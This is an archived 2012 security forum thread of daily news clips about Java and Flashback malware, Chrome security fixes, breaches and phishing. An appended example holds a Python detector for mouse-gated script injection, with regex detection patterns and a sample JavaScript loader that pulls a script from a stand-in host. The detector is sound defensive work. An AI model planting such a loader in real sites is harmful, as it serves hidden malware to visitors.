Forum Thread: Daily CYBERCLIPS April

You are currently viewing a forum thread in the Secunia Community Forum. Please note that opinions expressed here are not of Secunia but solely reflect those of the user who wrote it.

This thread was submitted in the following forum:
Open Discussions

This thread has been marked as locked.
mogs Daily CYBERCLIPS April
Expert Contributor 2nd Apr, 2012 19:40
Ranking: 2265
Posts: 6,266
User Since: 22nd Apr, 2009
System Score: 100%
Location: UK

Nineteenth Edition.

Thank you for the support. Hope you find something of value/interest in the new thread. The new INDEX thread will follow shortly.
Please refrain from scoring on both threads.
Security is the mainstay of the thread with some related and varied topics.
Scroll down for the latest posts !!
Note that no entry/post should be taken as a personal recommendation, unless otherwise stated.
Please continue to keep CYBERCLIPS free of junk and unattractive to any contentious individuals.
* Keep patching : up to date : be Cybersafe ! *

--

mogs CClip 1
Expert Contributor 2nd Apr, 2012 19:58
Unpatched Java bug infects Macs with Flashback malware
The Flashback.K variant is distributed via exploits for a known Java vulnerability that Apple has yet to patch

By Lucian Constantin
April 2, 2012 11:02 AM ET
IDG News Service - A Java vulnerability that hasn't yet been patched by Apple is being exploited by cybercriminals to infect Mac computers with a new variant of the Flashback malware, according to security researchers from antivirus firm F-Secure.

Flashback is a computer Trojan horse for Mac OS that first appeared in September 2011. The first variant was distributed as a fake Flash Player installer, but the malware has been changed significantly since then, both in terms of functionality and distribution methods.

Back in February, several antivirus companies reported that a new Flashback version was being distributed through Java exploits, which meant that the infection process no longer required user interaction.

More at :-
http://www.computerworld.com/s/article/9225757/Unp...

--
mogs CClip 2
Expert Contributor 2nd Apr, 2012 20:02
IE's browser share recovers, Chrome down for third straight month
Sign of a Microsoft turnaround, or just a calculation change by metrics company?

By Gregg Keizer
April 2, 2012 06:36 AM ET
Computerworld - Internet Explorer posted another major gain in share last month, the second in the first quarter of the year, perhaps signaling a turnaround in Microsoft's fortunes, a Web metrics company said Sunday.

Meanwhile, every rival, including Google's Chrome, which is usually the one stealing users, lost share.

Internet Explorer (IE) gained 1 percentage point during March, said measurement firm Net Applications, to end the month with a 53.8% share, its highest level since September 2011. Last month's growth was the second this year of 1 point or more.

Chrome lost a third of a percentage point to close March with 18.6%, while Mozilla's Firefox slipped by about the same to 20.6%, the open-source browser's lowest number in more than three years.

Apple's Safari and Opera Software's desktop browsers also dipped, falling by two-tenths and one-tenth of a point, respectively, to 5.1% and 1.6%.

More at :-
http://www.computerworld.com/s/article/9225740/IE_...

--
mogs CClip 3
Expert Contributor 2nd Apr, 2012 20:16
UK Government Wants Power to Monitor Internet Users

The United Kingdom government wants to give organizations such as MI5 and Government Communications Headquarters (GCHQ) the power to closely monitor all Internet traffic, including emails and website visits.


Similar to countries such as China, where every move made by Internet users is carefully monitored by the local government, UK citizens may also be tracked by state authorities.

According to The Guardian, the law is expected to be announced on May 9 and it will force service providers to collect information that may later be utilized by whichever agency requests it.

“It is vital that police and security services are able to obtain communications data in certain circumstances to investigate serious crime and terrorism and to protect the public. We need to take action to maintain the continued availability of communications data as technology changes,” a Home Office representative revealed.

More at :-
http://news.softpedia.com/news/UK-Governments-Want...

--
mogs CClip 4
Expert Contributor 2nd Apr, 2012 20:23
Windows XP Gains Market Share in March, Windows 7 Loses Ground

Although you might find the headline intriguing, you should know that things are indeed this way: Windows XP gained ground in March when compared to February.

The old operating system from Microsoft remains the leading platform in users’ preferences, with a 46.86 percent market share of the OS market, up from the 45.39 percent it accounted for last month, the latest data from Net Applications shows.


Ever since Windows 7 arrived on shelves, Windows XP has been losing market share to it, yet it appears that it still has the power to remain on top of the market.

Microsoft has been focused on pushing Windows 7 to the front for the past few years, and is expected to continue doing so until Windows 8 arrives on devices.

However, it appears that enterprises are not yet ready to move to the newer platform, even if Microsoft is determined to end the support for Windows XP in 2014.

Windows 7 accounted for 38.12 percent of the operating system market in February, and went down to 37.54 percent in March.

Windows Vista lost share as well, now accounting for 7.65 percent of the market, while Windows 8 gained ground at 0.11 percent share.

In February, Windows 8 enjoyed only 0.03 percent market share, yet the release of the Consumer Preview version on February 29th helped it grow.

More at :-
http://news.softpedia.com/news/Windows-XP-Gains-Ma...

--
mogs CClip 5
Expert Contributor 2nd Apr, 2012 20:28
Global Payments confirms 1.5 million MasterCard and Visa customer card details compromised

Almost 1.5 million Mastercard and Visa customers have had their credit card details compromised following a successful cyber raid on payment processing systems provider Global Payments.
Reports of an attack on the company first surfaced on Friday.
In a subsequent conference call the firm's chief executive Paul Garcia confirmed hackers had successfully broken into the company's card processing systems.
Garcia also clarified that the attack was contained to the company's North American processing systems but said it was too early to confirm the exact number of accounts affected.
"The company believes fewer than 1.5 million card numbers may have been stolen and that the theft is confined to our North American processing system," he said.
He also revealed that the hackers did not manage to get all the data contained on the system, meaning certain core items remain safe from exploitation.

More at :-
http://www.v3.co.uk/v3-uk/news/2165460/hackers-ste...

--
mogs CClip 6
Expert Contributor 3rd Apr, 2012 09:25
Oz launches DNSChanger testing site

Government service advises of connection-preventing malware infections
By Simon Sharwood, APAC Editor
Posted in Security, 3rd April 2012 01:24 GMT

Australia's government has created a website which detects the presence, or otherwise, of DNSChanger, a nasty piece of malware which the site says “... changes a user's Domain Name System (DNS) settings, enabling criminals to direct unsuspecting internet users to fraudulent websites and otherwise interfere with their web browsing.”

“It has been associated with 'click fraud', the installation of additional malware and other malicious activities,” the site adds.

The hiply-named www.dns-ok.gov.au does what it says on the can: load up the site and you'll be told whether or not the malware lurks within your system and if, ergo, your DNS is okay. If you are infected, the site urges you to do something about it before the FBI switches off its kludge fix that stops the malware from doing its worst. ®

http://www.theregister.co.uk/2012/04/03/dns_ok_gov...

--
mogs CClip 7
Expert Contributor 3rd Apr, 2012 19:47
Mozilla blacklists vulnerable Java plug-ins from Firefox
Mozilla decided to automatically disable outdated Java plug-ins in Firefox on Windows because of ongoing attacks targeting them

By Lucian Constantin | IDG News Service

Mozilla has blacklisted unpatched versions of the Java plug-in from Firefox on Windows in order to protect its users from attacks that exploit known vulnerabilities in those versions.

Mozilla can add extensions or plug-ins to the Firefox add-on blocklist if they cause significant security or performance issues. Firefox installations automatically query the blocklist and notify users before disabling the targeted add-ons.

"The February 2012 update to the Java Development Kit (JDK) and Java Runtime Environment (JRE) included a patch to correct a critical vulnerability that can permit the loading of arbitrary code on an end-user's computer," said Mozilla's channel manager Kev Needham in a blog post Monday.

"This vulnerability -- present in the older versions of the JDK and JRE -- is actively being exploited, and is a potential risk to users," Needham said. "To mitigate this risk, we have added affected versions of the Java plugin for Windows (Version 6 Update 30 and below as well as Version 7 Update 2 and below) to Firefox's blocklist."

Needham did not specify the vulnerability being actively exploited, but security companies have warned during the past couple of weeks that exploits for the CVE-2010-0507 Java vulnerability were being used in widespread attacks and have been incorporated into the popular Blackhole exploit toolkit.

Read more at :-
http://www.infoworld.com/d/security/mozilla-blackl...

--
mogs CClip 8
Expert Contributor 3rd Apr, 2012 19:53
Mozilla announces a working Firefox for Windows 8 Metro

Claims Metro is key in web browser wars
By Lawrence Latif
Tue Apr 03 2012, 17:53

SOFTWARE DEVELOPER Mozilla has announced that it has a working prototype of its Firefox web browser for the Metro user interface of Windows 8.
Mozilla had announced earlier that it would be building a version of its Firefox web browser for the Metro user interface in Microsoft's upcoming Windows 8 operating system. Within weeks, it announced that it had managed to port a build of Fennec over to Windows 8 Metro with a user interface that looks identical to Firefox for Android.
Mozilla's Brian Bondy said the browser can load websites, create tabs, bookmark pages, build history, retain cache, adjust preferences and generally behave like a web browser should. However Bondy said he didn't consider Mozilla's goal of having a working Firefox in Metro by the second quarter of 2012 as being met, saying that there are still open design questions and "a ton of platform integration work to do".

Read more at :-
http://www.theinquirer.net/inquirer/news/2165843/m...

--
mogs CClip 9
Expert Contributor 3rd Apr, 2012 19:58
Whoops! Check Point lets checkpoint.com expire
By Tim Greene | Network World US | 03 April 12
It's got to be a little embarrassing for a security company steeped in paying attention to details like opening and closing firewall ports and monitoring whether applications are behaving oddly to overlook an arguably major item like maintaining the company's domain name, but it happened to Check Point Software.

The company's site was down yesterday from 8:07 to 8:30 a.m. EDT on Monday, and the official word is it wasn't their fault, according to a statement from the company posted on The Register.

In the statement the company acknowledged the site was down for 23 minutes because the domain registration expired, but it was because its domain host Network Solutions sent the renewal notice to the wrong email address at Check Point.



Read more: http://www.pcadvisor.co.uk/news/security/3348967/w...

--
mogs CClip 10
Expert Contributor 3rd Apr, 2012 20:03
Hacker Reports Flaw in E-Learning Site Edmodo (Exclusive)

The popular e-learning platform Edmodo (edmodo.com), used by 6.6 million teachers and students worldwide, contains a number of vulnerabilities that could be leveraged by hackers to cause some serious damage to unsuspecting internauts.

The hacker known as Gambit provided us with information that demonstrates the existence of a persistent cross-site scripting (XSS) vulnerability and a cross-site request forgery (CSRF) flaw that affect Edmodo.

“Well, I contacted the admins a few weeks ago and they thanked me for reporting the vulnerabilities (persistent XSS and later a CSRF through the same vulnerable spot.),” Gambit explained.

“After reporting the CSRF a day or so later, he again thanked me and said he passed both the vulnerabilities up to one of the lead engineers. Well, weeks go by like I said and here we are, still not fixed.”

More at :-
http://news.softpedia.com/news/Hacker-Reports-Flaw...

--
mogs CClip 11
Expert Contributor 4th Apr, 2012 21:02
“US Airways Online Check-In” Emails Serve ZeuS

Internet users are advised to be on the lookout for malicious emails that purport to come from US Airways, bearing information regarding an online ticket reservation.

Kaspersky Lab experts inform that the phony notifications are well designed, even displaying a link to the company’s privacy policy.

However, behind the legitimate-looking “Online reservation details” link, the cybercrooks hid various malicious domains such as sulichat.hu, prakash.clanteam.com, or panvelkarrealtors.com.

If the link is clicked, the unsuspecting user is taken, after multiple redirects, to a site that hosts the infamous BlackHole exploit kit which tries to leverage vulnerabilities in Java, Adobe Reader, or Flash Player to drop a downloader.

This downloader connects to a command and control server from where it gets the sensitive-information-stealing Trojan known as ZeuS.

An interesting observation made by Kaspersky researchers is that all the objects involved in the attack, including ZeuS, the domains, and the downloader, are periodically changed.

More at :-
http://news.softpedia.com/news/US-Airways-Online-C...

--
mogs CClip 12
Expert Contributor 4th Apr, 2012 21:08
Comodo Launches Free Malware Scanning Service for Sites

Security solutions provider Comodo released a free service called SiteInspector, designed to scan websites for pieces of malware and compare them against a range of blacklisting services, such as the ones offered by Google Safe Browsing, PhishTank or Malwaredomainlist.

SiteInspector allows users to choose 3 pages on a domain that they want monitored. If the service identifies any trace of malicious elements, the customer is immediately notified via email.

Drive-by-download malware attacks launched from websites that fall victim to mass infections are highly common these days.

In these situations, one of the main problems is that the owner doesn’t even know that his site is altered to serve pieces of malware. Another issue is that once the site is infected, blacklisting services, such as the ones run by Google, will restrict the traffic, a measure that can have devastating consequences for the business workflow.

This is why security firms come up with such tools and services. SiteInspector can take that burden off the shoulders of the administrator and automatize the malware scanning and blacklist monitoring process.

More at :-
http://news.softpedia.com/news/Comodo-Launches-Fre...

--
mogs CClip 13
Expert Contributor 4th Apr, 2012 21:14
Google Chrome Dev 19.0.1084.9

Google has released a new Dev version for their web browser, incrementing the build number to 19.0.1084.9. The new revision is available for all supported platforms: Windows, Mac, Linux and Chrome Frame.

Apart from fixes, the set of changes also includes an update for the JavaScript engine, to build 3.9.24.7. Performance and stability improvements are a given with each release, but this version of V8 also enables snapshots on MIPS-based devices and comes with activated count-based profiler for ARM.

Repairs in this release of the web browser eliminate a few crash bugs on Windows and Mac, but also tackle an issue that affected the search in the “Settings” tab. Typing a keyword after deleting a previous one would cause the most recent entry to change to the first character of the first keyword.

http://news.softpedia.com/news/Download-Google-Chr...

--
mogs CClip 14
Expert Contributor 4th Apr, 2012 21:22
Urgent Fix for Zero-Day Mac Java Flaw

Apple on Monday released a critical update to its version of Java for Mac OS X that plugs at least a dozen security holes in the program. More importantly, the patch mends a flaw that attackers have recently pounced on to broadly deploy malicious software, both on Windows and Mac systems.
The update, Java for OS X Lion 2012-001 and Java for Mac OS X 10.6 Update 7, sews up an extremely serious security vulnerability (CVE-2012-0507) that miscreants recently rolled into automated exploit kits designed to deploy malware to Windows users. But in the past few days, information has surfaced to suggest that the same flaw has been used with great success by the Flashback Trojan to infect large numbers of Mac computers with malware.

Read more at :-
http://krebsonsecurity.com/category/latest-warning...

--
mogs CClip 15
Expert Contributor 4th Apr, 2012 21:31
Adobe Intros Open Source Malware Classifier

The Adobe Malware Classifier is available for download from SourceForge.

April 03, 2012
Adobe Systems recently released a malware classification tool designed to assist in the identification of malicious files.

"The 'Adobe Malware Classifier' tool uses machine learning algorithms to classify Windows executable and dynamic link library (DLL) files as clean, malicious or unknown, Adobe security engineer Karthik Raman said in a recent blog post," writes PCWorld's Lucian Constantin. "Raman originally developed Malware Classifier for in-house use by Adobe's Product Security Incident Response (PSIRT) Team."

"Adobe has decided to release the Python script publicly under an open source BSD license," Constantin writes. "It is available for download from SourceForge."

Go to "Adobe Releases Open Source Malware Classification Tool" to read the details.

http://www.esecurityplanet.com/open-source-securit...

--
mogs CClip 16
Expert Contributor 5th Apr, 2012 21:34
Microsoft acquires 20 new Windows security ideas for $13,400 each
$268,000 BlueHat Prize contest 'cheap way to get someone else to innovate,' says expert

By Gregg Keizer
April 4, 2012 05:34 PM
Computerworld - Microsoft has received 20 submissions in the $268,000 contest it hopes will result in new security technologies being baked into Windows, a company security strategist said Tuesday.

The "BlueHat Prize" contest, which debuted in August 2011, offers $200,000 as a first prize, $50,000 for second, and a subscription to Microsoft's developer network for third place. The three winners will be flown to Las Vegas this July, when Microsoft will announce the results at the Black Hat security conference.

Microsoft collected 20 entries before the April 1 deadline, said Katie Moussouris, a senior security strategist lead at Microsoft, on a company blog yesterday.

More at :-
http://www.computerworld.com/s/article/9225849/Mic...

--
mogs CClip 17
Expert Contributor 5th Apr, 2012 21:41

Chrome Stable and Beta Channel Updates
Labels: Beta updates, Stable updates

The Chrome Stable and Beta channels have been updated to 18.0.1025.151 on Windows, Mac, Linux and Chrome Frame. This release fixes issues including:
black screen on Hybrid Graphics system with GPU accelerated compositing enabled (Issue: 117371)
CSS not applied to <content> element (Issue: 114667)
Regression rendering a div with background gradient and borders (Issue: 113726)
Canvas 2D line drawing bug with GPU acceleration (Issue: 121285)
Multiple crashes (Issues: 72235, 116825 and 92998)
Pop-up dialog is at wrong position (Issue: 116045)
HTML Canvas patterns are broken if you change the transformation matrix (Issue: 112165)
SSL interstitial error "proceed anyway" / "back to safety" buttons don't work (Issue: 119252)
Known Issues:
HTML5 audio doesn't work on some Mac computers (Issue: 109441)
Security fixes and rewards:

A new version of Flash Player is included. More details are available in an addendum to this Flash Player advisory.

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.

[$500] [106577] Medium CVE-2011-3066: Out-of-bounds read in Skia clipping. Credit to miaubiz.
[117583] Medium CVE-2011-3067: Cross-origin iframe replacement. Credit to Sergey Glazunov.
[$1000] [117698] High CVE-2011-3068: Use-after-free in run-in handling. Credit to miaubiz.
[$1000] [117728] High CVE-2011-3069: Use-after-free in line box handling. Credit to miaubiz.
[118185] High CVE-2011-3070: Use-after-free in v8 bindings. Credit to Google Chrome Security Team (SkyLined).
[118273] High CVE-2011-3071: Use-after-free in HTMLMediaElement. Credit to pa_kt, reporting through HP TippingPoint ZDI (ZDI-CAN-1528).
[118467] Low CVE-2011-3072: Cross-origin violation parenting pop-up window. Credit to Sergey Glazunov.
[$1000] [118593] High CVE-2011-3073: Use-after-free in SVG resource handling. Credit to Arthur Gerkis.
[$500] [119281] Medium CVE-2011-3074: Use-after-free in media handling. Credit to Sławomir Błażek.
[$1000] [119525] High CVE-2011-3075: Use-after-free applying style command. Credit to miaubiz.
[$1000] [120037] High CVE-2011-3076: Use-after-free in focus handling. Credit to miaubiz.
[120189] Medium CVE-2011-3077: Read-after-free in script bindings. Credit to Google Chrome Security Team (Inferno).

Many of these bugs were detected using AddressSanitizer.


More detailed updates are available on the Chrome Blog. Full details about what changes are in this release are available in the SVN revision log. Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg
Google Chrome

--
mogs CClip 18
Expert Contributor 5th Apr, 2012 21:46

Fast-growing Flashback botnet includes over 600,000 Macs
Java-based attacks against Mac users resulted in over 600,000 Mac computers being infected with the Flashback Trojan horse, malware experts say

By Lucian Constantin | IDG News Service

More than 600,000 Macs have been infected with a new version of the Flashback Trojan horse that's being installed on people's computers with the help of Java exploits, security researchers from Russian antivirus vendor Doctor Web said on Wednesday.

Flashback is a family of Mac OS malware that appeared in September 2011. Older Flashback versions relied on social engineering tricks to infect computers, but the latest variants are distributed via Java exploits that don't require user interaction.

On Tuesday, Apple released a Java update in order to address a critical vulnerability that's being exploited to infect Mac computers with the Flashback Trojan horse.

However, a large number of users have already been affected by those attacks, Doctor Web said in a report issued on Wednesday. The company's researchers have managed to hijack a part of the Flashback botnet through a method known in the security community as sinkholing, and counted unique identifiers belonging to more than 550,000 Mac OS X systems infected with the Trojan horse.

More at :-
http://www.infoworld.com/d/security/fast-growing-f...

--
mogs CClip 19
Expert Contributor 5th Apr, 2012 21:52
Firms warned over IPv6 security risks

Industry players urge end users to step up security as IPv6 adoption grows.
By Caroline Donnelly,

Companies need to be on their guard against cyber criminals using IPv6 networks to stage attacks, as the number of compatible end point devices in the workplace soars.

This is the view of WAN optimisation vendor Blue Coat Systems, who want firms to upgrade their security strategies to cover IPv6 network vulnerabilities.

The use of IPv6 networks has been gradually rising in recent years as the number of IPv4 addresses has dwindled.

This shift has been gaining momentum since the beginning of the year, when the Internet Society confirmed 6 June as World IPv6 Launch Day.

More at :-
http://www.itpro.co.uk/639937/firms-warned-over-ip...

--
mogs CClip 20
Expert Contributor 5th Apr, 2012 21:59
SharePoint 2010 now supports Chrome, Firefox

Latest versions of third-party browsers supported, but IE6 cast out
By Simon Sharwood, APAC Editor

Posted in Software, 5th April 2012 01:17 GMT

Microsoft has made a small-but-useful change to SharePoint 2010, as the popular collaboration suite now supports Firefox and, for the first time, Chrome.

The change was announced in a low-key blog post by Kirk Stark, Senior Writer on the SharePoint Server Platforms Team, which states “For any third-party browser (including Google Chrome, Firefox, Apple Safari, etc.) we will support the latest publically released version. There is no more distinction regarding version numbers.”

The new list of supported browsers, available at the SharePoint 2010 Plan Browser Support page, reveals that SharePoint will happily run without limitations in Chrome and Firefox.

Safari is now supported too, but won't behave well enough to do everything the SharePoint 2010 web interface allows.

Internet Explorer 6 has been downgraded from “not tested” to “not supported” as Redmond tries to hammer yet more nails into the coffin of the once-oddly-popular browser.

64-bit browsers are still a no-no and various limitations crop up when using ActiveX controls.

The old list of supported browsers can be seen if you fire up the wayback machine and head here. ®

http://www.theregister.co.uk/2012/04/05/sharepoint...

--
mogs CClip 21
Expert Contributor 5th Apr, 2012 22:06
LibreOffice 3.5.2 Final Available for Download

After two release candidates, the final version for LibreOffice 3.5.2 has rolled out. There are no changes since the second RC shipped a month ago, but the developer offers some useful notes for those that haven’t yet adopted this version of the suite.

Windows users still working with versions of LibreOffice older than build 3.4.5 are recommended either to upgrade to 3.4.5 first and then update to the latest release, or to remove the old bits altogether and perform a fresh install of the current revision.

Also on Windows, if OpenOffice is present on the system, the recommendation is to remove it, as the same file types are used by LibreOffice too. In case Office 2010 is present, there will be warnings that ODF 1.2 and extended documents written by LibreOffice 3.5 are invalid, but it will still open them.

On Linux it is advisable to use OpenJDK instead of the GCJ Java variant since the latter has known issues with LibreOffice.

http://news.softpedia.com/news/LibreOffice-3-5-2-F...

--
mogs CClip 22
Expert Contributor 9th Apr, 2012 19:30

Details on Latest Windows Live Essentials 2011 Release Emerge

A few weeks ago, Microsoft made available for download a new version of Windows Live Essentials 2011, namely 15.4.3555.308, and updated many of the components inside the suite.

At the time, the company said that the new release was only a minor update for the package, and did not offer specific info on what was modified.

Last week, however, a company’s employee posted on Microsoft Answers specific details on what the update included. For those who missed our previous post on the new Windows Live Essentials 2011 flavor, we should note that the update affected Windows Live Messenger, Mail, Photo Gallery, Movie Maker, Family Safety, Writer, and Windows Live Mesh.

The software was made available for users of Windows 7, Windows Server 2008 R2, and Windows Vista Service Pack 2, and Microsoft announced at the time that it was set to roll out to all customers in a matter of weeks.

According to said Microsoft employee, changes in this release include:

Setup: During installation, the splash screen loads faster after user accepts UAC prompt.

Windows Live Mail: When users click on photos within Windows Live Mail that are hosted on SkyDrive or Facebook, instead of using the Client Album Viewer to view the photos, a browser opens the web album viewer for that application.

Windows Live Messenger: Fixes the Messenger sign-in error "0x84cb000c" and the Messenger crash or hang when accepting/declining a pending invitation. When users click on photos that are hosted on SkyDrive or Facebook, instead of using the Client Album Viewer to view the photos, a browser opens the web album viewer for that application.

Windows Live Movie Maker: Fixes error “80004003” where Windows Live Movie Maker can’t open project files. Fixes setup failure error “80040705” and error “87260103” or when Movie Maker becomes unresponsive, hangs when adding WMV video files.

Windows Photo gallery: Microsoft updated authorization method required to publish to Flickr and Facebook. Microsoft updated authorization method to communicate with Bing Maps services for geo tagging.

Dubbed “QFE3” (Quick Fix Engineering), the new release contains critical fixes for the Essentials package. Initially available only as an optional update, it will become a requirement for all eligible customers, Microsoft announced.

All those who update from Windows Live Essentials 2009 to 2011 will enjoy the aforementioned enhancements. Said updated apps are available for download from Softpedia as well, via the links below.

http://news.softpedia.com/news/Details-on-Latest-W...

--
mogs CClip 23
Expert Contributor 9th Apr, 2012 19:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Mozilla's Lightning 1.4b3 Released

Mozilla announced today the availability of a new release for their Lightning add-on, integrated into Thunderbird by default. It is not a stable build, but the third beta for version 1.4, and it fixes some critical issues present in the previous revision.

Users running the second beta of the add-on in Thunderbird 12 (beta) may be confronted with a bunch of problems, such as gazing at blank calendars or the error console showing an abundance of errors. At the root of the trouble are broken localizations, which have been erroneously introduced.

Lightning 1.4b3 should also prove to be useful for those using the Provider for Google Calendar add-on, as it fixes the problem that causes events in secondary calendars to be moved to the primary one when editing.

A stable build for Lightning as well as a new one for Provider for Google Calendar are planned to ship on May 1st.

http://news.softpedia.com/news/Mozilla-s-Lightning...

--
mogs CClip 24
Expert Contributor 9th Apr, 2012 19:45
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Web attacks use smart redirection to evade URL security scanners
Web attacks based on the Nuclear Pack exploit toolkit check for mouse cursor movement before serving their payload

By Lucian Constantin | 09 April 12
Security researchers from antivirus vendor ESET have come across new Web-based malware attacks that try to evade URL security scanners by checking for the presence of mouse cursor movement.
The new drive-by download attacks were spotted in the Russian Web space and don't require user interaction to infect computers with malware.

Most attacks of this type rely on hidden iframes being injected into legitimate, but compromised websites, to redirect their visitors to the actual attack page. However the websites affected by this new campaign don't exhibit such rogue elements.

Instead, rogue JavaScript code is being added to local JS files that get loaded in the "head" section of every HTML page, making the infection harder to spot, the ESET security researchers said in a blog post on Friday. Loading JavaScript in this way is a very common practice and is not particularly indicative of a compromise.

The code injected into these local JavaScript files loads a different JS file from an external location, but only if mouse cursor movement is detected on the page. The purpose of the mouse movement detection is to filter out URL scanners and Web crawlers used by security companies or search engines to detect infected websites.

Read more: http://www.pcadvisor.co.uk/news/security/3349812/w...

--
Was this reply relevant?
+0
-0
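Added example (not part of the post or the quoted article): a triage heuristic for the pattern described in CClip 24, flagging site JavaScript files in which a mouse-event handler coexists with run-time script injection pointing at a host outside the site. The file names, hosts and sample snippets are constructed, and the regexes are an assumed heuristic that obfuscated code can defeat.

```python
import re
from urllib.parse import urlparse

# Handlers that only fire when a real pointer moves over the page.
MOUSE_GATE = re.compile(
    r"\bon(?:mousemove|mouseover|mouseenter)\s*=|"
    r"(?:addEventListener|attachEvent)\s*\(\s*['\"](?:on)?mouse(?:move|over|enter)['\"]",
    re.IGNORECASE,
)
# Script elements created at run time rather than declared in the HTML.
SCRIPT_INJECT = re.compile(
    r"createElement\s*\(\s*['\"]script['\"]\s*\)|document\.write(?:ln)?\s*\([^)]*<script",
    re.IGNORECASE,
)
# Quoted absolute or protocol-relative URLs inside the source.
URL_LITERAL = re.compile(r"['\"]((?:https?:)?//[^'\"\s]+)['\"]")


def external_hosts(source, site_host):
    """Hosts named in URL literals that are neither the site nor its subdomains."""
    hosts = set()
    for match in URL_LITERAL.finditer(source):
        host = (urlparse(match.group(1)).hostname or "").lower()
        if host and host != site_host and not host.endswith("." + site_host):
            hosts.add(host)
    return sorted(hosts)


def scan_js(source, site_host):
    """Report the three signals and whether all of them occur in one file."""
    result = {
        "mouse_gate": bool(MOUSE_GATE.search(source)),
        "script_injection": bool(SCRIPT_INJECT.search(source)),
        "external_hosts": external_hosts(source, site_host),
    }
    result["suspicious"] = bool(
        result["mouse_gate"] and result["script_injection"] and result["external_hosts"]
    )
    return result


def triage(files, site_host):
    """Return the names of files that deserve a manual diff against a clean copy."""
    return sorted(name for name, src in files.items() if scan_js(src, site_host)["suspicious"])


# Constructed samples: a tooltip helper, an ungated analytics loader, and a
# library file with a mouse-gated external loader appended to it.
SAMPLES = {
    "js/tooltip.js": """
        var tip = document.getElementById('tip');
        document.addEventListener('mousemove', function (e) {
          tip.style.left = e.pageX + 'px';
        });
    """,
    "js/analytics.js": """
        var s = document.createElement('script');
        s.src = 'https://stats.example.org/a.js';
        document.head.appendChild(s);
    """,
    "js/jquery.plugins.js": """
        /* ... legitimate library code ... */
        var done = false;
        document.onmousemove = function () {
          if (done) return; done = true;
          var s = document.createElement('script');
          s.src = 'http://cdn.example.invalid/stat.js';
          document.getElementsByTagName('head')[0].appendChild(s);
        };
    """,
}

if __name__ == "__main__":
    for name in triage(SAMPLES, "shop.example"):
        print(name, scan_js(SAMPLES[name], "shop.example"))
```

A hit is only a reason to compare the file with a known-good copy; lazy-loading widgets can trigger the same signals.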
mogs CClip 25
Expert Contributor 9th Apr, 2012 21:03
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft retires Vista, Office 2007 from mainstream support this week
Security updates continue through mid-April 2017

By Gregg Keizer
April 9, 2012 02:36 PM ET
Computerworld - Microsoft will shift Windows Vista and Office 2007 into what it calls extended support over the next two days.

Vista, the problem-plagued operating system that never really took hold among users, will exit mainstream support on Tuesday, April 10. According to Microsoft, Office 2007 leaves mainstream support today.

In a product's extended support phase, Microsoft continues to provide security patches to all users, but offers other fixes -- such as reliability and stability updates -- only to organizations that have signed support contracts with the company.

Just seven weeks ago, Microsoft quietly extended support for the consumer versions of Windows Vista -- as well as Windows 7 -- by five years to synchronize their support lifecycle with that of the comparable enterprise editions.

Read more at :-
http://www.computerworld.com/s/article/9225979/Mic...

--
mogs CClip 26
Expert Contributor 10th Apr, 2012 22:39
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Microsoft patches critical Windows zero-day bug that hackers are now exploiting
Fixes first security flaw in Windows 8 Consumer Preview

By Gregg Keizer

Computerworld - Microsoft today delivered six security updates to patch 11 vulnerabilities in Windows, Internet Explorer (IE), Office and several other products, including one bug that attackers are already exploiting.

The company also issued the first patch for Windows 8 Consumer Preview, the beta-like build Microsoft released at the end of February.

But it was MS12-027 that got the most attention today.

"Things got a bit more interesting today," said Andrew Storms, director of security operations at nCircle Security, "because Microsoft is reporting limited attacks in the wild."

Flaws that attackers exploit before a patch is available are called "zero-day" vulnerabilities.

The single vulnerability patched in MS12-027 is in an ActiveX control included with every 32-bit version of Office 2003, 2007 and 2010; Microsoft also called out SQL Server, Commerce Server, BizTalk Server, Visual FoxPro and Visual Basic as needing the patch.

Storms, other security experts and Microsoft, too, all identified MS12-027 as the first update users should install.

Hackers are already using the vulnerability in malformed text documents, which when opened either in Word or WordPad -- the latter is a bare bones text editor bundled with every version of Windows, including Windows 7 -- can hijack a PC, Microsoft acknowledged in a post to its Security Research & Defense (SRD) blog today.

"We list MS12-027 as our highest priority security update to deploy this month because we are aware of very limited, targeted attacks taking advantage of [the] CVE-2012-0158 vulnerability using specially-crafted Office documents," said Elia Florio, an engineer with the Microsoft Security Response Center, in the SRD blog post.

More at :-
http://www.computerworld.com/s/article/9226060/Mic...

--
mogs CClip 27
Expert Contributor 10th Apr, 2012 22:46
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 10th Apr, 2012 22:48
Chrome updates
Beta Channel Update
| 08:00
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.15 for Windows, Mac, Linux, and Chrome Frame.

For an overview of key features in this release check out the Google Chrome Blog. Interested in switching to the Beta or Stable channels? You can also take a look at the changelog to see what happened in this release since 18.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome

Stable Channel Update
Monday, April 9, 2012 | 17:03
Labels: Stable updates

The Chrome Stable channel has been updated to 18.0.1025.152 on Windows.


This release fixes issues with SSL (Issue: 118706). Please note this might reintroduce Issue: 117371 and we are actively working on a fix for it.


Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Karen Grunberg

--
mogs CClip 28
Expert Contributor 11th Apr, 2012 05:55
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
How to Tell If an Email Is a Phishing Scam
By Meridith Levinson
April 10, 2012 03:57 PM ET
CIO - Email phishing scams have grown more sophisticated since they first began popping up in corporate inboxes in the 1990s. Early phishing emails were relatively easy to detect as they were characterized by poor grammar and spelling. No legitimate business would send an email to customers chockfull of typos.

As email users grew wary of phishing attempts, cybercriminals have had to change their tactics and their lures. Today, phishers are churning out much more convincing and effective emails. Not only are the most persuasive specimens well-written, they are also often personalized, addressing the recipient by name. In addition, they replicate the look and feel of authentic emails from legitimate businesses down to the fonts, footers, logos and copyright statements those companies use in electronic correspondence with their customers.

Read more at :-
http://www.computerworld.com/s/article/9226056/How...

--
mogs CClip 29
Expert Contributor 11th Apr, 2012 06:00
